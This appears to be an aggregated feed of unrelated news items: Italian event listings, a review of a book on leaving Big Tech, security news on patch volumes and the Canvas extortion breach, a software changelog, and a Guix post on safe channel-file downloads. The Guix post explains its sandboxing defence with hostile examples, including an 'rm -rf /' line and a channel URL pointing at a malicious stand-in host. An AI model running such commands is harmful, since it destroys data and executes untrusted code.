APMAT26 vedrà la partecipazione di Antonio Prado, Consulente Tecnico di Assoprovider e figura di riferimento nel panorama italiano delle reti e delle infrastrutture Internet. Dottore di ricerca in Computer Science, con un Master universitario di II livello in Innovazione nella Pubblica Amministrazione, Antonio Prado è ricercatore esterno presso il Dipartimento di Ingegneria dell’Informazione dell’Università di […]
L'articolo Antonio Prado ad APMAT26: competenze tecniche al servizio degli Operatori di Prossimità proviene da Assoprovider.
APMAT26 ospiterà l’intervento di Livio Morina, Presidente di PeeringDB e professionista con una lunga esperienza nel mondo delle reti, dell’interconnessione e delle infrastrutture Internet. La sua presenza porterà all’evento un contributo tecnico di grande valore su temi molto concreti per gli Operatori di Prossimità: AS Number, peering, interconnessione, aggiornamento dei dati di rete, visibilità internazionale […]
L'articolo Livio Morina, Presidente PeeringDB, ad APMAT26 proviene da Assoprovider.
YouTube, Facebook, Instagram, TikTok: sono le piattaforme social più utilizzate dagli italiani. Social media, e non social network, visto che – come sottolinea Kenobit nel suo nuovo saggio “Assalto alle piattaforme” (Agenzia X) – l’obiettivo è tenerci agganciati a consumare passivamente contenuti multimediali, invece che mobilitarci per creare rete.
App come queste sono infatti caratterizzate dall’apparente gratuità e da un algoritmo esplicitamente progettato per generare dipendenza, stimolando uno scrolling destinato a non finire mai. Lo stesso Aza Raskin, il designer che nel 2006 ha ideato lo scrolling infinito (cioè il caricamento continuo e automatico di nuovi contenuti durante lo scorrimento, senza un punto di arresto naturale), a distanza di 20 anni si è dichiarato pentito della sua invenzione. Inoltre queste piattaforme intrappolano gli utenti in modo che non clicchino su link che rimandano a siti esterni, inibendo così l’uscita dalle piattaforme.
“Il gioco è sempre lo stesso”, scrive Kenobit. “Visto che il profitto delle piattaforme è direttamente proporzionale al tempo che gli dedichiamo, i loro meccanismi sono studiati scientificamente per aumentarlo il più possibile. Produciamo valore quando creiamo contenuti, ma anche quando li consumiamo”.
Per un utente che non cerca altro che intrattenimento, luoghi del genere sembrano l’Eldorado. E invece si tratta, antropologicamente parlando, di veri e propri non luoghi: spazi in cui non si creano connessioni, ma che si attraversano di passaggio per andare da un contenuto a un altro senza che resti all’utente alcun valore aggiunto.
“Se non stai pagando per il prodotto, il prodotto sei tu”, verrebbe da dire, riprendendo le parole rese celebri dal film “The social dilemma”. Ed ecco una delle frasi che Kenobit punta a decostruire nel suo saggio: su queste piattaforme persino chi paga – le aziende e le attività che versano una quota per occupare spazi pubblicitari – è a sua volta un prodotto, perché genera ulteriori dati che le piattaforme raccolgono e sfruttano per arricchirsi vendendoli.
Ma cosa – o meglio chi – sono queste piattaforme? Tra quelle citate, si possono raggruppare Facebook e Instagram (e WhatsApp), del gruppo Meta fondato da Mark Zuckerberg. C’è poi YouTube, proprietà come Google della holding Alphabet Inc., di cui i fondatori di Google, Larry Page e Sergey Brin, sono ancora i maggiori azionisti e membri del consiglio di amministrazione, detenendo di fatto il controllo dell’azienda, pur non essendo più amministratori delegati.
Meta ha registrato un fatturato di 164,5 miliardi di dollari per l’intero anno 2024, segnando una crescita del 22% rispetto al 2023. Alphabet Inc. ha registrato ricavi annuali record, superando i 400 miliardi di dollari nel 2025, grazie alla crescita della pubblicità. C’è di più: entrambi i colossi hanno espliciti legami con il presidente degli Stati Uniti Donald Trump, e sono nella lista BDS (Boicottaggio, Disinvestimento e Sanzioni) per il loro coinvolgimento nel genocidio in Palestina.
Ma se sono così poco etiche perché è tanto difficile abbandonare queste piattaforme? Probabilmente, perché non tutto ciò che avviene sui social è nocivo. Quante amicizie, progetti, idee, iniziative non sarebbero nate o diventate così note se non fosse stato per i social? Kenobit fa l’esempio delle mobilitazioni per la Palestina realizzate dal 7 ottobre 2023 in poi, in cui i social, nonostante le varie dinamiche di shadow ban – cioè di oscuramento della tematica, costringendo talvolta a utilizzare caratteri speciali per parlarne (per esempio scrivendo G4z4 invece di Gaza) – hanno avuto un ruolo fondamentale. Il ruolo dei social è stato centrale anche nella formazione di grandi movimenti di protesta come Fridays For Future, con la nascita di nuclei di attivisti in ogni parte del mondo, o Black Lives Matter, con la condivisione di massa del video della morte di George Floyd e la propagazione delle sue ultime parole “I can’t breathe”.
Il problema è che, sui social, in breve tempo si passa oltre: nuovi contenuti, nuovi trend, nuove cose a cui prestare attenzione, togliendo forza al desiderio e all’urgenza di convergenza e di organizzazione. Tra i limiti dell’attivismo online c’è infatti la necessità di sottostare alle logiche algoritmiche delle piattaforme, con Meta che al contempo blocca la possibilità di promuovere post dal contenuto a sfondo politico o sociale e ne limita anche la diffusione organica, tramite l’impostazione che permette di non visualizzare contenuti politici tra quelli suggeriti nel proprio feed.
Fare attivismo sui social significa inoltre rischiare di scivolare, talvolta senza rendersene nemmeno conto, in quello che viene definito slacktivism, o attivismo da poltrona, cioè un tipo di attivismo che si limita alla condivisione di contenuti sui propri canali, senza che questo gesto si concretizzi in nulla di più radicale o d’impatto.
Inoltre, perché il proprio attivismo cambi le cose, l’obiettivo dev’essere quello di costruire comunità. Appoggiarsi alle piattaforme mainstream significa invece, come scrive Kenobit, “costruire a casa d’altri”, lasciando in mano loro il destino del nostro attivismo ed esponendosi al rischio che post, profili e gruppi vengano cancellati in qualsiasi momento, quasi senza possibilità di replica. “Queste piattaforme non sono democratiche”, scrive sempre Kenobit. Chi crea contenuti rischia, tra l’altro, di diventare schiavo dei numeri, piegandosi a trattare di temi non controversi o divisivi in modo da raggiungere il maggior numero di persone possibili – talvolta finendo per capitalizzare le lotte sponsorizzando prodotti che con queste hanno qualche punto di contatto (magliette, tote bag o oggetti figli, per esempio, del greenwashing). Così facendo, l’attivismo diventa un lavoro da influencer più che da potenziali leader politici.
“Abbiamo davanti una lotta impari, contro un nemico ben fortificato, con risorse economiche e tecnologiche senza precedenti nella storia dell’umanità”, prosegue Kenobit nel saggio. “Non lo prenderemo mai per sfinimento, né possiamo sperare di batterlo sul suo stesso terreno. Le piattaforme possiedono tutto, incluso il campo di battaglia, e se anche riuscissimo a metterle in difficoltà in casa loro potrebbero semplicemente cambiare le regole del gioco. Per lo stesso motivo, anche se usare alcuni dei loro strumenti può avere dei meriti strategici, non possiamo sperare di cambiarle dall’interno. Non può esserci riformismo in una dittatura. La disparità è evidente anche sul fronte della comunicazione, perché le piattaforme, controllando la dimensione digitale, proiettano un’influenza tangibile sul reale”.
Nonostante questa posizione, Kenobit è abilissimo nel fornire alternative valide a ciascuno dei problemi legati alle piattaforme, spiegando con parole comprensibili a tutti che cosa si può fare e perché dovremmo farlo. Per esempio, la proposta di passare al Fediverso come alternativa ai social media mainstream è legata all’eticità dell’utilizzo di un software open source, ovvero il cui codice è consultabile e utilizzabile praticamente da chiunque, invece che chiuso, proprietario e i cui meccanismi sono noti solo a pochi eletti.
Come si legge in “Assalto alle piattaforme” (disponibile gratuitamente anche come audiolibro):
Il software libero si basa su una filosofia completamente diversa. Come suggerisce il nome, è pensato per tutelare la nostra libertà. Nello specifico, quattro libertà:
Kenobit elenca molti motivi per cui preferire i social del Fediverso a quelli ancora mainstream: tra questi, l’assenza di un algoritmo che determina che cosa mostrare a chi a favore di un feed che rispetta l’ordine cronologico delle pubblicazioni, garantendo a tutti di non perdersi nulla e di dare a ogni contenuto la giusta dignità e diffusione. “L’assenza di pubblicità vanifica la necessità di un algoritmo che seleziona al posto nostro cosa mostrarci”.
Va da sé che è impossibile che il passaggio dai social mainstream al Fediverso sia rapido e collettivo. Per questo, una valida soluzione intermedia consiste nel mantenere i propri profili sui social tradizionali, ma smettendo gradualmente di postare contenuti e utilizzandoli soprattutto, come da tempo fa Kenobit, per sponsorizzare il passaggio ad altre piattaforme.
Il controllo che Big Tech può esercitare va però ben oltre le singole piattaforme. Durante una presentazione del libro che si è svolta a Torino, a Radio Blackout, l’11 febbraio 2026, è nato un dibattito sul possesso delle dorsali internet (backbone): infrastrutture fisiche ad altissima capacità, composte da cavi sottomarini in fibra ottica posati sui fondali oceanici. Trasportano oltre il 99% del traffico dati mondiale tra continenti, connettendo reti locali e garantendo la velocità della connessione web.
Già questo aspetto pone un importante problema, perché, anche utilizzando piattaforme alternative a quelle mainstream, ci si continuerebbe ad appoggiare a questo sistema, che resta in buona parte in mano a colossi privati. Le dorsali sono infatti gestite da un consorzio di grandi aziende di telecomunicazioni internazionali, colossi tecnologici (Google, Meta, Amazon, Microsoft) e, in parte, da governi.
In risposta a questa osservazione, Kenobit ha suggerito di cercare il sito di Antennine, che punta a costruire reti comunitarie. Citando il loro blog, “le reti comunitarie sono infrastrutture locali di telecomunicazione create da gruppi di persone (una comunità) per connettersi a Internet e fornire servizi di comunicazione digitale. Sono costruite e gestite come un bene comune, cioè una risorsa prodotta e mantenuta collettivamente, piuttosto che detenuta privatamente, come alternativa alle grandi reti commerciali o statali e ai fornitori di servizi Internet”. Sul sito di Antennine sono presenti le istruzioni per contattare gli organizzatori del progetto e unirsi alla rete. È solo un inizio, che rappresenta però un baluardo di resistenza per ricordarsi che costruire delle alternative è possibile.
Altri esempi internazionali di gestione comunitaria e democratica dell’accesso a internet sono Guifi.net, nata in Catalogna nel 2004 e che punta a costruire una rete dal basso in modo da connettere aree rurali portando la connessione internet laddove non arrivano gli operatori commerciali tradizionali, e Freifunk, nata a Berlino, che ha come obiettivo quello di fornire una rete internet libera e accessibile a tutti.
Un altro tema critico riguarda le conoscenze necessarie per poter usare – o anche solo entrare in contatto – con le piattaforme alternative. È necessaria in primis un’alfabetizzazione digitale, non scontata in un contesto in cui solo il 46% degli italiani possiede competenze di base in quest’ambito, ma anche una coscienza politica tale da problematizzare le piattaforme, oltre a contatti che tramite il passaparola permettano di accedere ad alternative come il Fediverso.
Per fare effettivamente la differenza, c’è insomma prima di tutto bisogno di fare massa critica, scegliere che direzione prendere e costruirla insieme. Come scrive Kenobit, “abbiamo un’occasione imperdibile per rivendicare una dimensione digitale fondata sulla cooperazione invece che sulla competizione”.
L'articolo Fuga da Big Tech proviene da Guerre di Rete.
SOMO
Solo Modernariato
23 – 24 maggio 2026
Superstudio Più, Milano
Gli spazi del Superstudio Più ospitano l’unica fiera in Italia dedicata esclusivamente al modernariato,
per un viaggio tra estetica, storia e sostenibilità.
Dopo il successo delle precedenti edizioni, SOMO (Solo Modernariato) compie il grande salto e arriva a Milano. L’appuntamento è per il fine settimana del 23 e il 24 maggio 2026 in Via Tortona 27, cuore pulsante della Milano Design Week, all’interno degli spazi del Superstudio Più.
L’approdo a Milano segna la maturità di SOMO. La scelta della sede non è casuale, portare il modernariato puro in Via Tortona significa infatti rimettere la storia del design al centro del dibattito contemporaneo.
SOMO non è una semplice mostra – mercato, ma è un percorso immersivo nella storia dello stile che evidenzia il meglio di un’epoca che ha ridefinito l’estetica globale.
Tutti i tesori del XX secolo saranno messi in vendita da oltre 70 espositori d’eccellenza provenienti da tutta la penisola, come Curiosità d’altri Tempi, Otomana, Sessantotto, Artime, Officina 84, Stov, Creazioni D’interni per citarne alcuni, che offriranno al pubblico una panoramica unica sulla produzione che va dal secondo dopoguerra agli eclettici anni Ottanta.
In un mondo dominato dal consumo rapido e “usa e getta”, SOMO propone un’inversione di rotta: l’acquisto consapevole. Il modernariato, infatti, è l’antitesi dello spreco: comprare design del XX secolo significa scegliere oggetti dal valore culturale crescente, capaci di unire estetica, utilità e creatività. È l’incontro perfetto tra il fascino del passato e il gusto attuale, dove l’identità dell’oggetto diventa protagonista dell’arredamento.
Ogni pezzo che sarà possibile trovare a SOMO è infatti un frammento di storia pronto a iniziare una nuova vita. Oggetti nati da una fattura artigianale d’altri tempi, progettati per durare, spesso ritenuti significativi in quanto testimonianza dell’evoluzione del design e per questo ancora oggi riscontrano particolare interesse sul mercato dell’arredamento e dell’oggettistica.
Dalla poltrona d’autore, protagonista delle pellicole che hanno fatto la storia del cinema, ai complementi d’arredo capaci di trasformare radicalmente l’identità di un ambiente domestico, ogni oggetto è scelto per la sua capacità di raccontare una storia.
Gli espositori presenti offriranno una vasta gamma di pezzi iconici nati dalla visione dei grandi maestri del design mondiale. Tra le proposte spiccano l’illuminazione d’avanguardia di Artemide, le sedute intramontabili di Luigi Caccia Dominioni, il rigore architettonico degli arredi di Franco Albini e pezzi che nascono dalle visioni rivoluzionarie di Joe Colombo, Le Corbusier e Charles & Ray Eames.
Un tributo non solo ai designer, ma anche ai brand italiani che hanno trasformato idee visionarie in simboli globali, riscrivendo la storia della qualità manifatturiera.
Che si tratti di illuminazione, mobili o piccoli complementi d’arredo, SOMO si propone come il nuovo punto di riferimento per chi cerca l’autenticità in un mercato sempre più standardizzato.
L’alto profilo curatoriale, inoltre, si fonde con una proposta accessibile, capace di emozionare tanto il collezionista esperto quanto il giovane appassionato alla ricerca del suo primo “pezzo vero”.
La storia di SOMO
SOMO prende vita nel 2024 vicino a Bergamo, presso lo Spazio Fase (uno dei simboli più affascinanti di archeologia industriale del territorio), partendo da una profonda riflessione sul panorama del collezionismo attuale: per troppo tempo il modernariato è rimasto confinato in angoli di mercatini generalisti o fiere eterogenee e mai valorizzato come unicità. Il progetto nasce per colmare questo vuoto.
SOMO non è una semplice fiera, ma un’operazione culturale volta a valorizzare ogni singolo pezzo come opera d’arte, creando un’esperienza espositiva senza precedenti che mette in risalto l’identità stilistica e la storia di ogni arredo.
Per informazioni
SOMO – Solo Modernariato
23-24 maggio 2026
Superstudio più
Via Tortona, 27 – 20144, Milano
Tel. 3518568819
Instagram @somo_designmarketitaly
Facebook https://www.facebook.com/somodesignmarket
–
Ingresso
8,50 euro
Link per acquistare i biglietti
https://qromo.it/q/?t=kvwymc4g
Orari
Sabato: 10 – 19
Domenica: 10 – 18
L'articolo Arriva a Milano SOMO – Fiera dedicata interamente al Modernariato proviene da InfoMilano.news.
Artificial intelligence platforms may be just as susceptible to social engineering as human beings, but they are proving remarkably good at finding security vulnerabilities in human-made computer code. That reality is on full display this month with some of the more widely-used software makers — including Apple, Google, Microsoft, Mozilla and Oracle — fixing near record volumes of security bugs, and/or quickening the tempo of their patch releases.
As it does on the second Tuesday of every month, Microsoft today released software updates to address at least 118 security vulnerabilities in its various Windows operating systems and other products. Remarkably, this is the first Patch Tuesday in nearly two years that Microsoft is not shipping any fixes to deal with emergency zero-day flaws that are already being exploited. Nor have any of the flaws fixed today been previously disclosed (potentially giving attackers a heads up in how to exploit the weakness).
Sixteen of the vulnerabilities earned Microsoft’s most-dire “critical” label, meaning malware or miscreants could abuse these bugs to seize remote control over a vulnerable Windows device with little or no help from the user. Rapid7 has done much of the heavy lifting in identifying some of the more concerning critical weaknesses this month, including:
May’s Patch Tuesday is a welcome respite from April, which saw Microsoft fix a near-record 167 security flaws. Microsoft was among a few dozen tech giants given access to a “Project Glasswing,” a much-hyped AI capability developed by Anthropic that appears quite effective at unearthing security vulnerabilities in code.
Apple, another early participant in Project Glasswing, typically fixes an average of 20 vulnerabilities each time it ships a security update for iOS devices, said Chris Goettl, vice president of product management at Ivanti. On May 11, Apple shipped updates to address at least 52 vulnerabilities and backported the changes all the way to iPhone 6s and iOS 15.
Last month, Mozilla released Firefox 150, which resolved a whopping 271 vulnerabilities that were reportedly discovered during the Glasswing evaluation.
“Since Firefox 150.0.0 released, they have been on a more aggressive weekly cadence for security updates including the release of Firefox 150.0.3 on May Patch Tuesday resolving between three to five CVEs in each release,” Goettl said.
The software giant Oracle likewise recently increased its patch pace in response to their work with Glasswing. In its most recent quarterly patch update, Oracle addressed at least 450 flaws, including more than 300 fixes for remotely exploitable, unauthenticated flaws. But at the end of April, Oracle announced it was switching to a monthly update cycle for critical security issues.
On May 8, Google started rolling out updates to its Chrome browser that fixed an astonishing 127 security flaws (up from just 30 the previous month). Chrome automagically downloads available security updates, but installing them requires fully restarting the browser.
If you encounter any weirdness applying the updates from Microsoft or any other vendor mentioned here, feel free to sound off in the comments below. Meantime, if you haven’t backed up your data and/or drive lately, doing that before updating is generally sound advice. For a more granular look at the Microsoft updates released today, checkout this inventory by the SANS Internet Storm Center.
The latest version of Fedora has been released with gaming support.
L'articolo Il 44% dei lavoratori italiani utilizza l’AI: opportunità e sfide per le Direzioni HR proviene da FullPress.
La corsa all’AI sta creando nuove superfici di attacco e i cybercriminali stanno iniziando a sfruttarle con tecniche sempre più sofisticate. L’ultimo caso arriva dal mondo dei modelli open source e delle piattaforme collaborative dedicate all’intelligenza artificiale: un repository malevolo pubblicato su Hugging Face è riuscito a spacciarsi per un progetto ufficiale di OpenAI, raggiungendo […]
L'articolo Falso repository OpenAI su Hugging Face distribuisce malware proviene da Securityinfo.it.
When offered the option to run other people’s code, a prime
consideration is often ease of deployment. While much progress has been
made in support of rapid deployment, the security implications of those
quick deployments is often overlooked. In this post, we look at a new
feature of guix time-machine and guix pull in support of one-line
deployment commands: the ability to download channel files, but without
compromising on security.
The normal workflow to share software and make it easily deployable with Guix goes like this: someone puts their packager hat on and writes a package definition, adds it to Guix proper or to a separate channel, at which point anyone can fetch the relevant channel(s) and deploy the software.
As an example, let’s assume you want to run
yt-dlp as packaged in
the latest Guix revision without upgrading your system or going through
an explicit installation step. The simplest way to do that is with this
command:
guix time-machine -q -- shell yt-dlp -- yt-dlp …If you’re familiar with Nix, this is equivalent—with some important differences we’ll discuss below—to this command:
nix shell nixpkgs#yt-dlp --command yt-dlp …In both cases, we’re fetching the latest revision of the package
collection (the master branch for Guix, the nixpkgs-unstable branch
of Nixpkgs for Nix) and running yt-dlp from there. (nix run
goes one step further by removing the need to specify the command name.)
Now, that was an easy example because yt-dlp comes from Guix itself.
What if you’d like to deploy an application that’s in another channel
such as Guix-Science?
Well, you would first need to come up with a channels.scm file for
Guix-Science and then you
can pass it to guix pull or guix time-machine:
$EDITOR channels.scm
# Make sure that includes Guix-Science.
guix time-machine -C channels.scm -- shell …If you’re lucky, perhaps you can download a channel file. For example, Cuirass produces them for all successfully-evaluated commits, so you can fetch one for Guix-Science and go from there:
wget -O channels.scm \
https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
guix time-machine -C channels.scm -- shell …You can even do it in a single command using Bash process substitution!
guix time-machine \
-C <(wget -O https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science) \
-- shell …Is it a good idea though?
If you look more closely, the nix shell command and the last two guix time-machine commands have a bit of a curl | sh flavor to it:
downloading arbitrary code and running it without further ado. All nix shell does is authenticate github.com, through HTTPS, and likewise
for wget—that you’re downloading from the genuine github.com doesn’t
tell you anything about the trustworthiness of the code you’re running.
In the case of Guix, the channels.scm you’re downloading could very
well read this:
(system* "rm" "-rf" "/") ;uh-oh!Here system*, as you might have guessed, invokes a
command.
Because yes, channel files can contain arbitrary Scheme code! (It’s
worth noting that this particular problem is one Nix doesn’t have: Nix
being a domain-specific language (DSL) already limits what Nix code can
do, especially with so-called “pure� evaluation.)
Or it could read something like this:
(list (channel
(name 'guix)
;; This is Mallory’s malicious Guix, now you’re PWND!
(url "https://example.org/EVIL/guix.git")
(branch "master")
(introduction
(make-channel-introduction
"badc0ffeed807b096b48283debdcddccfea34bad"
(openpgp-fingerprint
"DEAD CABB A99E F6A8 0D1D E643 A2A0 6DF2 A33A BADD")))))In this case, the channel file looks good, but the channel you’ll fetch—probably not so much.
So no: downloading a channel file and using it without checking it is not reasonable.
Can we have our cake and eat it too? Can we casually download someone else’s channel file without putting our system at risk?
Changes that have just landed in guix pull and guix time-machine aim
to address these seemingly contradictory needs. The two commands are
now equipped to download by themselves: just pass them a URL with the
-C (or --channels) option.
guix time-machine \
-C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master \
-- …Crucially, this command is not equivalent to the naïve -C <(wget -O …) trick we saw above.
First, channel code is now evaluated in a “sandbox�: it can only access a predefined set of bindings, cannot import additional modules, and it must run in a limited amount of time and with a limited amount of memory allocated. This still provides access to many general-purpose facilities but blocks anything that could be used to alter the system state, exfiltrate data, or cause a denial of service.
With this in place, evaluating a channel file can be considered safe.
Now, one problem remains: the file might list channels that I as a user
do not trust. And here we see a tension between fetching channel files
from out there and keeping one’s system safe. To address that, we
define a new rule: only trusted channels may be deployed; if a channel
file lists untrusted channels, guix pull and guix time-machine error
out. Trusted channels are defined as follows:
~/.config/guix/trusted-channels.scm, if
it exists—this file lists channels just like a regular channel file;guix describe.This brings us to the interesting question of channel identity. This
channel I call guix-science in my trusted-channels.scm, someone else
might as well call it Guix-Science or science; how can I tell if
we’re dealing with the channel that I call guix-science and that I
trust?
The key insight is that the name itself doesn’t matter; the element that does matter is the “introduction� of the channel—the piece of information that tells how to authenticate updates of that channel. If you forgot that episode, the introduction the thing with hexadecimal strings that appears in a channel specification:
(channel
(name 'guix-past)
(url "https://codeberg.org/guix-science/guix-past")
(introduction ;this hex soup 👇 is the channel’s identity
(make-channel-introduction
"0c119db2ea86a389769f4d2b9c6f5c41c027e336"
(openpgp-fingerprint
"3CE4 6455 8A84 FDC6 9DB4 0CFB 090B 1199 3D9A EBB5"))))Two channels with the same introduction are one and the same. Thus, if
my trusted-channels.scm contains a channel with the above
introduction, pull and time-machine will happily pull from it.
The corollary is that a channel that cannot be authenticated—i.e., that
lacks the introduction field—cannot be considered a trusted channel.
Overall, this “trusted channel� rule trades flexibility for safety.
It’s a tradeoff but one that looks like a better default than anything
that effectively amounts to arbitrary code execution à la curl | sh.
“Why would I want to download channel files?�, you may ask? Here’s a list of typical use cases we have in mind.
The first one is downloading a channel file from a continuous integration system—to deploy from a known-good state, to test a new package version or a new feature, to reproduce a bug, etc. Cuirass serves channel files for every channel set it evaluates. So for example, you can pull the latest Guix channel that was successfully evaluated like this:
guix pull -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=masterLikewise, this is how you’d travel to the latest Guix-Science channel and dependent channels to execute RStudio:
guix time-machine \
-C https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
-- shell rstudio -- rstudioA second, similar use case is one-line commands for demos: if you’re
developing an application, you can package it, publish a channel file,
and share a time-machine command to spawn it. With pinned
channels,
you can ensure users run it from a known-good state.
A third use case that is emerging is channel releases. Teams maintaining third-party channels might want to tag releases of their channel as a channel files where each channel is pinned. This is what the Guix-Science project recently decided to do.
In the same vein, a fourth use case is the publication of a tested channel file that a whole team, or a whole fleet of computers, would upgrade from. Imagine a group of people responsible for testing who would periodically publish a new channel file pinned to known-good commits that all the team members or an entire fleet could safely pull from—it could even be used for unattended upgrades!
The fifth use case is reproducible
research.
A computational workflow can be
captured
by two files: channels.scm and manifest.scm. In some cases, we
might as well download the channel file.
But wait… the astute reader might have felt some dissonance: downloading a channel file to set up a supposedly reproducible workflow? That can’t be right: the channel file could change over time, or it could vanish from its original URL. That’s not reproducibility, is it?
As Simon Tournier was prompt to suggest, the solution is to support SWHIDs (Software Hash Identifiers) in addition to URLs. A SWHID is essentially a standardized content hash that uniquely identifies “content�—raw data or structured data such as directories and version-control revisions. If you followed along, you might remember that Guix is connected to the Software Heritage archive. Software packaged in Guix is in the archive and so all we had to do is connect the dots.
Consider this command:
guix time-machine \
-C swh:1:cnt:003e1e0c1b9b358082201332c926ae54e9549002 \
-- …It downloads the channel file identified by the given SWHID and then proceeds.
The SWHID serves as an unambiguous and unique content address to refer
to a specific channel set. It can be computed using guix hash,
but of course, the channel file must first be present in the Software
Heritage archive. Thus, if the file is part of a version-control
repository, you can first request archiving of that
repository. In a research
paper, one may include a single command to re-run computations the paper
builds upon.
This new addition felt pleasurable for several reasons. First because it addresses use cases that people had been talking for a while, and it’s always nice to fill gaps. It also felt good because several design choices complement each other so that everything here falls into place: channel specifications, Guile’s “sandboxing�, channel authentication, and Software Heritage integration.
The whole endeavor—allowing for quick deployment without compromising on
security—might sound quixotic or, some might say, anachronistic, at a
time when the
pips, the
npms,
the
snaps
and many more are all about deploying software of unknown origin like
there’s no tomorrow. In Guix we do believe that transparency,
provenance tracking, and verifiability matter for the software we run;
efforts like this one are guided by these principles.
The feature landed just a few days ago. Give it a try and let’s hope you find it pleasant as well!
I am grateful to Caleb “Reepca� Ristvedt for their thorough code review and insightful suggestions, and to Simon Tournier for commenting on the general approach and suggesting improvements. Many thanks to Rutherther and to Cayetano Santos for reviewing an earlier draft of this post.
L'articolo OpenAI presenta Realtime 2.0, Codex per Chrome e altre novità per sviluppatori proviene da FullPress.
The latest Manjaro 26.1 preview has been released with new desktop versions, a new kernel, and more.
Il ritmo della house internazionale torna protagonista a Milano con Bob Sinclar,
icona mondiale della musica elettronica, pronto a infiammare la città con un evento esclusivo.
Il celebre DJ sarà ospite il Giovedi 28 maggio 2026 al JustMe Milano,
tra le location simbolo della nightlife milanese.
La serata si preannuncia carica di energia e musica, con un DJ set studiato per far ballare il pubblico fino a notte fonda.
Grazie a successi internazionali come Love Generation, World, Hold On e Rock This Party, Bob Sinclar continua da anni a rappresentare un punto fermo della scena dance mondiale, conquistando pubblici di ogni età con il suo stile unico e inconfondibile.
L’evento milanese è già considerato tra gli appuntamenti più attesi della stagione clubbing 2026.
La presenza dell’artista francese richiamerà infatti nel cuore della città appassionati della dance music, fan e amanti della nightlife desiderosi di vivere un’esperienza dal sapore internazionale.
Tra sonorità coinvolgenti, atmosfera esclusiva e una delle venue più celebri di Milano,
la notte firmata Bob Sinclar promette di trasformarsi in uno degli eventi simbolo della primavera milanese.
Un appuntamento dedicato a chi ama lasciarsi trasportare da musica, stile ed emozioni fino all’alba.
PROMO TICKET ONLINE :
https://xceed.me/en/milano/event/bob-sinclar-25/220672/channel/maxhaloa
Credits Photo Web Bob Sinclar e Justme.milano
L'articolo Bob Sinclar arriva a Milano ! proviene da InfoMilano.news.
This is a major release.
Feature highlights✨:
cli/purge.php to apply purge policy from command lineBug fixes highlights 🐛:
Security highlights 🛡:
UI highlights 🖼:
Extensions highlights 🧩:
This release has been made by @Alkarex, @Inverle, @Kiblyn11, @math-GH, @rupakbajgain, @xtmd and newcomers @polybjorn, @olivluca, @tomasodehnal, @PeterVavercak, @mrtnrdl, @ale-rt, @cweiske, @rid3r45, @gabbihive, @drosell271, @Kachelkaiser, @zanivann, @nanos, @bowencool, @pe1uca, @matheusroberson, @DenuxPlays, @rlrs, @chanse-syres, @IEEE-754, @umaidshahid, @michi-onl
Full changelog:
mdate:P1D for finding articles modified by the author / server during the past day.toString in case of regex-looking string #8479<iframe> referrer allow list #8672allowfullscreen to <iframe> #8467Set-Cookie using native PHP support of SameSite #8447, #8778
session.cookie-lifetime in php.ini<meta name="referrer" content="no-referrer" /> from deprecated never #8725.content pre code #8620Minz_HookType::ActionExecute #8599, #8603Minz_HookType as hook name in registerHook() #8600httpGet() #8700httpGet() cache nullable #8705select-input-changer JavaScript helper #8721get_icon_url() for feed favicon simplepie#974get_thumbnail() #8634, simplepie#970cli/purge.php to apply purge policy #8740timeago() #8670AGENTS.md, SKILLS.md, instructions.md #8478
L’intelligenza artificiale sta, ovviamente e progressivamente, cambiando anche il modo in cui vengono condotte attività di reconnaissance, threat intelligence e analisi offensiva. Accanto ai tradizionali strumenti OSINT, stanno emergendo nuovi progetti che vanno oltre la pura automazione e puntano sulla capacità di guidare i Large Language Model attraverso metodologie operative strutturate. Uno degli esempi più […]
L'articolo Ecco il GitHub per fare di Claude un operatore OSINT avanzato proviene da Securityinfo.it.
In the recent weeks I've been engaging Prot as an Emacs coach to help
with doing review passes over my upcoming ffs package as I work on
polishing and documenting it in preparation for offering it for
inclusion in GNU ELPA.
Yesterday we had our second session focused on ffs, which I recorded
and share publicly with everyone with Prot's permission, so that
others can also benefit from Prot's insights and experience as we
discuss various aspects of Emacs package development with the concrete
example of ffs.
Here is the video recording of our session:
You can view or download the full-resolution video from the Internet Archive.
I addressed most of Prot's feedback about ffs from our first
session, and I'll be working on the changes we discussed in this
session in the next days.
In the last third of the video we switched topics to discuss a few
Emacs-related tangents including adding a 'padding' effect for the
mode line and its constructs, and distilling and separating the
easily-reusable package-like parts of one's Emacs configuration from
the actual configuration of those parts (e.g. the distinction of
prot-lisp and prot-emacs-modules in Prot's Emacs configuration).
For mode line padding, here is the snippet I'm using with Prot's
doric-themes:
(doric-themes-with-colors
(custom-set-faces
`(mode-line
((t :box (:line-width 6 :color ,bg-shadow-intense))))
`(mode-line-inactive
((t :box (:line-width 6 :color ,bg-shadow-subtle))))
`(mode-line-highlight
((t :box (:color ,bg-shadow-intense))))))
Take care, and so long for now.
An ongoing data extortion attack targeting the widely-used education technology platform Canvas disrupted classes and coursework at school districts and universities across the United States today, after a cybercrime group defaced the service’s login page with a ransom demand that threatened to leak data from 275 million students and faculty across nearly 9,000 educational institutions.
A screenshot shared by a reader showing the extortion message that was shown on the Canvas login page today.
Canvas parent firm Instructure responded to today’s defacement attacks by disabling the platform, which is used by thousands of schools, universities and businesses to manage coursework and assignments, and to communicate with students.
Instructure acknowledged a data breach earlier this week, after the cybercrime group ShinyHunters claimed responsibility and said they would leak data on tens of millions of students and faculty unless paid a ransom. The stated deadline for payment was initially set at May 6, but it was later pushed back to May 12.
In a statement on May 6, Instructure said the investigation so far shows the stolen information includes “certain identifying information of users at affected institutions, such as names, email addresses, and student ID numbers, as well as as messages among users.” The company said it found no evidence the breached data included more sensitive information, such as passwords, dates of birth, government identifiers or financial information.
The May 6 update stated that Canvas was fully operational, and that Instructure was not seeing any ongoing unauthorized activity on their platform. “At this stage, we believe the incident has been contained,” Instructure wrote.
However, by mid-day on Thursday, May 7, students and faculty at dozens of schools and universities were flooding social media sites with comments saying that a ransom demand from ShinyHunters had replaced the usual Canvas login page. Instructure responded by pulling Canvas offline and replacing the portal with the message, “Canvas is currently undergoing scheduled maintenance. Check back soon.”
“We anticipate being up soon, and will provide updates as soon as possible,” reads the current message on Instructure’s status page.
